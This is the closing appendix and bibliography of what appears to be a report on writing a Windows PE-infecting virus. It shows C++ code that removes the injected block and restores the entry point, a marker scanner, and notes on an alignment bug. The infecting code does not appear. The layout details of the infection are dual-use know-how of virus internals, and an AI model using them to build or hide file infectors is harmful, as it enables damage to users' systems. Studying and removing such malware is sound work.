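The listing rounds sizes up to the file alignment with the expression ((size / alignment) + 1) * alignment. For the example in its comment (280 and 200) this gives 400, but when the size is already an exact multiple of the alignment it adds one full alignment unit of padding. The following is a minimal sketch of the usual round-up idiom for comparison. The function names align_up and align_listing are our own and do not occur in the listing, and we assume that size + alignment - 1 does not overflow 32 bits.

```cpp
#include <cassert>
#include <cstdint>

// Round `size` up to the next multiple of `alignment`.
// A size that is already aligned is returned unchanged.
// Assumption: alignment is non-zero and size + alignment - 1 fits in 32 bits.
inline std::uint32_t align_up(std::uint32_t size, std::uint32_t alignment) {
    assert(alignment != 0);
    return (size + alignment - 1) / alignment * alignment;
}

// The rounding expression as written in the listing, kept for comparison.
// It always moves to the *next* multiple, even when `size` is already aligned.
inline std::uint32_t align_listing(std::uint32_t size, std::uint32_t alignment) {
    assert(alignment != 0);
    return (size / alignment + 1) * alignment;
}
```

Both functions agree whenever the size is not a multiple of the alignment. They differ only in the aligned case, for example a size of 0x400 with an alignment of 0x200, where align_up returns 0x400 and align_listing returns 0x600.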

Appendix B

Disinfection code

This code implements the procedure described in 5.6.

#include <Windows.h>
#include <cstdio>
#include <cstring>

int main(int argc, char* argv[]) {
    // Layout of the injected block; these values must match the infecting build.
    DWORD total_size = 3764;  // total size of the injected block
    int aStubOffset = 1172;   // offset of the assembly stub inside the block
    DWORD oepOffset = 15;     // offset of the stored entry point inside the stub

    PIMAGE_DOS_HEADER pDosHeader;
    PIMAGE_NT_HEADERS pNtHeaders;
    PIMAGE_SECTION_HEADER pFirstSection, pLastSection;
    HANDLE hFile, hFileMap;
    LPBYTE hMap;
    // Declared up front so that no goto jumps over an initialization.
    PBYTE oepPtr, writePtr;
    DWORD oep, alignment, alignedTotalSize, size_decrease;
    DWORD fsize = 0;

    // Map file to disinfect.
    const char *fileName = "PEview.exe";

    hFile = CreateFileA(fileName, GENERIC_WRITE | GENERIC_READ,
        FILE_SHARE_READ | FILE_SHARE_WRITE,
        NULL, OPEN_EXISTING, FILE_ATTRIBUTE_NORMAL, NULL);
    if(hFile == INVALID_HANDLE_VALUE) {
        printf("[-] Cannot open %s\n", fileName);
        return 1;
    }

    // GetFileSize reports failure as INVALID_FILE_SIZE, not as 0.
    fsize = GetFileSize(hFile, 0);
    if(fsize == INVALID_FILE_SIZE || fsize == 0) {
        printf("[-] Could not get file size\n");
        CloseHandle(hFile);
        return 0;
    }

    hFileMap = CreateFileMapping(hFile, NULL, PAGE_READWRITE, 0, fsize, NULL);
    if(!hFileMap) {
        printf("[-] CreateFileMapping failed\n");
        CloseHandle(hFile);
        return 0;
    }

    hMap = (LPBYTE)MapViewOfFile(hFileMap, FILE_MAP_ALL_ACCESS, 0, 0, fsize);
    if(!hMap) {
        printf("[-] MapViewOfFile failed\n");
        CloseHandle(hFileMap);
        CloseHandle(hFile);
        return 0;
    }

    // Check signatures, to see whether it's a valid EXE.
    pDosHeader = (PIMAGE_DOS_HEADER)hMap;
    if(pDosHeader->e_magic != IMAGE_DOS_SIGNATURE) {
        printf("[-] DOS signature not found\n");
        goto cleanup;
    }

    // Check for our signature in the reserved field of the DOS header.
    if(pDosHeader->e_res[0] != 0x424a) {
        printf("[-] File not infected\n");
        goto cleanup;
    }

    // Pointer arithmetic on the mapped view instead of casting it to DWORD.
    pNtHeaders = (PIMAGE_NT_HEADERS)(hMap + pDosHeader->e_lfanew);
    if(pNtHeaders->Signature != IMAGE_NT_SIGNATURE) {
        printf("[-] NT signature not found\n");
        goto cleanup;
    }

    // Get first and last section.
    pFirstSection = (PIMAGE_SECTION_HEADER)(hMap + pDosHeader->e_lfanew + sizeof(IMAGE_NT_HEADERS));
    pLastSection = pFirstSection + (pNtHeaders->FileHeader.NumberOfSections - 1);

    // Find the jump to the oep in the last section.
    oepPtr = hMap + pLastSection->PointerToRawData + pLastSection->Misc.VirtualSize
        - total_size + aStubOffset + oepOffset;
    memcpy(&oep, oepPtr, sizeof(DWORD));
    // The stub stores an absolute address; convert it back to an RVA.
    oep -= pNtHeaders->OptionalHeader.ImageBase;

    // Remove our viral code.
    writePtr = hMap + pLastSection->PointerToRawData + pLastSection->Misc.VirtualSize - total_size;
    memset(writePtr, 0, total_size);

    // Modify the section sizes in the last section header.
    pLastSection->Misc.VirtualSize -= total_size;
    alignment = pNtHeaders->OptionalHeader.FileAlignment;
    alignedTotalSize = ((pLastSection->Misc.VirtualSize / alignment) + 1) * alignment;
    size_decrease = pLastSection->SizeOfRawData - alignedTotalSize;
    pLastSection->SizeOfRawData = alignedTotalSize;
    printf("Aligned viral code size = %lu\n", alignedTotalSize);
    printf("Size decrease = %lu\n", size_decrease);

    pNtHeaders->OptionalHeader.SizeOfImage = pLastSection->VirtualAddress
        + pLastSection->Misc.VirtualSize; // ?? stackoverflow.com/a/8197500

    // Restore original entrypoint.
    pNtHeaders->OptionalHeader.AddressOfEntryPoint = oep;

    // Remove our signature.
    pDosHeader->e_res[0] = 0;

    // Decrease the file size to throw away unneeded space in the last
    // section's raw data. First, clean up the old map.
    FlushViewOfFile(hMap, 0);
    UnmapViewOfFile(hMap);
    CloseHandle(hFileMap);

    // Note: the actual file size decrease is handled by the SetFilePointer
    // and SetEndOfFile calls in the clean up section.
    fsize -= size_decrease;
    goto cleanup2;

cleanup:
    FlushViewOfFile(hMap, 0);
    UnmapViewOfFile(hMap);
    CloseHandle(hFileMap);

cleanup2:
    SetFilePointer(hFile, fsize, NULL, FILE_BEGIN);
    SetEndOfFile(hFile);
    CloseHandle(hFile);
    return 0;
}
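The check that the disinfection code performs before it touches a file can also be used on its own as a read-only scan. The following is a minimal sketch of such a scan, operating on a byte buffer instead of a mapped file so that it does not depend on Windows.h. The names scan_dos_header, ScanResult and read_u16_le are our own. The offsets 0x00 (e_magic) and 0x1C (e_res[0]) follow from the layout of IMAGE_DOS_HEADER, and 0x424a is the value tested in the listing above. A match is only a heuristic, since the reserved field of an unrelated file could hold the same value.

```cpp
#include <cassert>
#include <cstddef>
#include <cstdint>
#include <vector>

// Field offsets inside IMAGE_DOS_HEADER.
constexpr std::size_t kOffsetMagic   = 0x00;  // e_magic
constexpr std::size_t kOffsetRes0    = 0x1C;  // e_res[0]
constexpr std::size_t kDosHeaderSize = 0x40;  // sizeof(IMAGE_DOS_HEADER)

constexpr std::uint16_t kDosSignature = 0x5A4D;  // "MZ"
constexpr std::uint16_t kMarker       = 0x424A;  // value checked by the disinfection code

enum class ScanResult { NotExecutable, Clean, Marked };

// Read a little-endian 16-bit value at `off`.
inline std::uint16_t read_u16_le(const std::vector<std::uint8_t>& bytes, std::size_t off) {
    assert(off + 1 < bytes.size());
    return static_cast<std::uint16_t>(bytes[off] | (bytes[off + 1] << 8));
}

// Classify a file image by its DOS header only; the buffer is never modified.
inline ScanResult scan_dos_header(const std::vector<std::uint8_t>& image) {
    if (image.size() < kDosHeaderSize) return ScanResult::NotExecutable;
    if (read_u16_le(image, kOffsetMagic) != kDosSignature) return ScanResult::NotExecutable;
    return read_u16_le(image, kOffsetRes0) == kMarker ? ScanResult::Marked
                                                      : ScanResult::Clean;
}
```

A caller would read the first 64 bytes of a file into the vector and only hand the file to the disinfection code when the result is ScanResult::Marked.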

List of Figures

3.1 Typical Portable EXE File Layout

4.1 Screenshots of PEview and CFF Explorer

4.2 Example of a code cave

5.1 Structure of the injected code

6.1 Filesize before and after infection

6.2 Infected file, containing (a) our signature and (b) our constant strings

6.3 Greeting of our virus

6.4 Next generation virus


Bibliography

[1] Detailed Guide To Pe Infection. http://www.rohitab.com/discuss/topic/33006-detailed-guide-to-pe-infection/, December 2008.

[2] Chronicles of a PE Infector. http://tigzyrk.blogspot.fr/2012/09/analysis-chronicles-of-pe-infector.html, September 2012.

[3] c0v3rt+. Adding sections to PE Files: Enhancing functionality of programs by adding extra code. http://www.woodmann.com/fravia/covert1.htm, July 1999.

[4] David M. Chess and Steve R. White. An Undetectable Computer Virus. Proceedings of Virus Bulletin Conference, 2000.

[5] CNET. Flawed Symantec update cripples Chinese PCs, May 2007.

[6] ExtremeTech. Antivirus Research and Detection Techniques. http://www.extremetech.com/computing/51498-antivirus-research-and-detection-techniques, July 2002.

[7] HBGary. Loading a DLL without calling LoadLibrary. http://www.hbgary.com/loading-a-dll-without-calling-loadlibrary.

[8] The Inquirer. MSE false positive detection forces Google to update Chrome, October 2011.

[9] Mark A. Ludwig. The Giant Black Book of Computer Viruses. Amer Eagle Pubns Inc, 1995.

[10] Microsoft. Microsoft PE and COFF Specification. Revision September 2010.

[11] Norman. The Norman Book on Computer Viruses. 2002.


[12] Matt Pietrek. Peering Inside the PE: A Tour of the Win32 Portable Executable File Format. MSDN Magazine, 9(3), March 1994.

[13] Matt Pietrek. Inside Windows: An In-Depth Look into the Win32 Portable Executable File Format (Part I). MSDN Magazine, 17(2), February 2002.

[14] Matt Pietrek. Inside Windows: An In-Depth Look into the Win32 Portable Executable File Format (Part II). MSDN Magazine, 17(3), March 2002.

[15] Ed Skoudis and Lenny Zeltser. Malware: Fighting Malicious Code. Prentice Hall, November 2003.

[16] Peter Szor. The Art of Computer Virus Research and Defense. Pearson Education, 2005.

[17] Andrew S. Tanenbaum. Modern Operating Systems. Prentice Hall, 3rd edition, 2007.

[18] Ollie Whitehouse. An Analysis of Address Space Layout Randomization on Windows Vista. Symantec Advanced Threat Research, 2007.

[19] ZDNet. McAfee to compensate businesses for buggy update, April 2010.